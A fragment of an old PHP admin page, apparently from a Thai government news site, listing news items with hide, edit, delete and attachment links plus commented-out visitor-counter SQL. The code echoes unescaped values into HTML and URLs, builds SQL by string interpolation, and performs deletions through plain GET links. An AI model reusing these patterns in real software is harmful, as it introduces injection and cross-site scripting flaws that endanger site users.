        <td width="12%" height="8" align="center" valign="top" bgcolor="#F3F5F8"><? if (($appsession[10] == "on" ) or ($appsession[100] == "on" )){
			if($rs[hide]!=1){  ?>
            <a href="<?=$PHP_SELF;?>?act=hide&cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>" onClick="if(!confirm('ต้องการระงับการแสดงผลหัวข้อนี้?')) return false;"><img src="../../images/email_close.gif" alt="คลิ้ก : เพื่อตั้งค่าให้รายการนี้ไม่แสดงผลต่อสาธารณะ" width="15" height="12" border="0" /></a>
            <? }  else { ?>
            <a href="<?=$PHP_SELF;?>?act=unhide&cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>" onClick="if(!confirm('ต้องการยกเลิกระงับการแสดงผลหัวข้อนี้?')) return false;"><img src="../../images/email_open.gif" alt="คลิ้ก : เพื่อตั้งค่าให้รายการนี้แสดงผลต่อสาธารณะ" width="15" height="12" border="0" /></a>
            <? } } if (($appsession[300] == "on" )){ if($rs[type]==1) { ?>
            <a href="showcat_attach.php?cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>"><img src="../../images/attach.gif" alt="attach file" width="13" height="12" border="0"></a>
          <? } ?>
            
			


		
		

				<a href="<?=$PHP_SELF;?>?act=edit&cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?><? if($rs[type]==2){ echo "&prop=1"; } ?>"><img src="../../images/edit.png" width="12" height="13" border="0" /></a>
	
			
			<a href="<?=$PHP_SELF;?>?act=del&cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>" onClick="if(!confirm('ต้องการลบหัวข้อนี้?')) return false;"><img src="../../images/del.png" width="11" height="13" border="0" /></a>
            <? } ?>		        </td>
      </tr>
      <? } else {?>
      <tr>
        <td width="5%" height="8" align="center" valign="top" bgcolor="#F3F5F8"><span class="style2"><?=$counter;?></span></td>
        <td width="95%" align="left" valign="middle" bgcolor="#F3F5F8">
					<strong>หน่วยงาน : <?=$arr_gname[$rs[org_id]]?> </strong>					
					<br><strong>ดัชนีข่าว : <?=$rs[index_news] ?></strong>							
					<br><strong>หัวข้อข่าว : </strong>		
							
		<a href="showcat.php?act=view&cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>"><strong>
            <span class="style2"><?=$rs[title];?> </span>
          </strong></a>
            <?=$ext_url?>		  </td>
      </tr>
      <? } $counter++; } }?>
    </table></td>
  </tr>
</table>
<? 
#echo "<pre>";print_r($_SESSION) ; 
} 
?>
</body>
</html>
<? ################### insert to counter
####### REPLACE  INTO gov_news_counter_all (xdate,sarid,counter) VALUES ('2009-09-21','10','3')  
####### REPLACE INTO gov_news_counter_unique (xdate,xtime,userip,sarid) VALUES ('2009-09-21','01:01:01','127.0.0.1','7')  
###  REPLACE  INTO gov_news_counter_all (xdate,sarid,counter) VALUES ( NOW() , '$nowsarid'   ,'5')  
###  REPLACE INTO gov_news_counter_unique (xdate,xtime,userip,sarid) VALUES ( NOW()  ,  NOW()  ,'$userip',  '$nowsarid'  )  
### เตรียมข้อมูล $nowsarid
/*
$userip =  $_SERVER['REMOTE_ADDR'] ;
$xtoday =  date("Y")  ."-".   date("m")   ."-".  date("j")   ; #2006-05-20  


$nextcounter = 1 ; 
$sql12 = " SELECT * FROM gov_news_counter_all  where xdate  =  '$xtoday'  " ; 
#echo $sql12 ; 
$result12 = mysql_query($sql12) ; 
while ($rs12 = mysql_fetch_assoc($result12)){
	$last_counter = $rs12[counter] ; 
	 $rs12[counter] +1 ; 
} ############## END while ($rs12 = mysql_fetch_assoc($result12)){


$sqlcounter   = "  REPLACE  INTO gov_news_counter_all (xdate,sarid,counter) VALUES ( NOW() , '$nowsarid'   ,'$nextcounter'  )   "; 
#echo " $sqlcounter  ";
$resultcounter = mysql_query($sqlcounter) ; 
#if (mysql_errno() != 0){ echo "ขออภัยในความไม่สะดวก เกิดปัญหาบรรทัดที่ ".__LINE__. "กรุณาติดต่อ Call center<br> <br> ข้อความระบบ :: ".mysql_error() ; die; } 

if ($_SESSION[username] ){ 
	$sqlcounter   = "  REPLACE INTO gov_news_counter_unique (xdate,xtime,userip,sarid) VALUES ( NOW()  ,  NOW()  ,'$userip',  '$nowsarid'  )     "; 
	$resultcounter = mysql_query($sqlcounter) ; 
	#if (mysql_errno() != 0){ echo "ขออภัยในความไม่สะดวก เกิดปัญหาบรรทัดที่ ".__LINE__. "กรุณาติดต่อ Call center<br> <br> ข้อความระบบ :: ".mysql_error() ; die; } 
} ################# END if ($_SESSION[username] ){ 

*/




?>
<?
//insert timeQuery
 $time_end = getmicrotime();
  writetime2db($timestart,$timeend);
//insert timeQuery
# เช็ค แต่ละข่าวอยู่ในหมวดซ้ำ
# เช้คว่า 
#SELECT  sub_id  , count(sub_id)   FROM kpi_detail_member    group by sub_id  order by count(sub_id) desc 
?>

Anon7 - 2021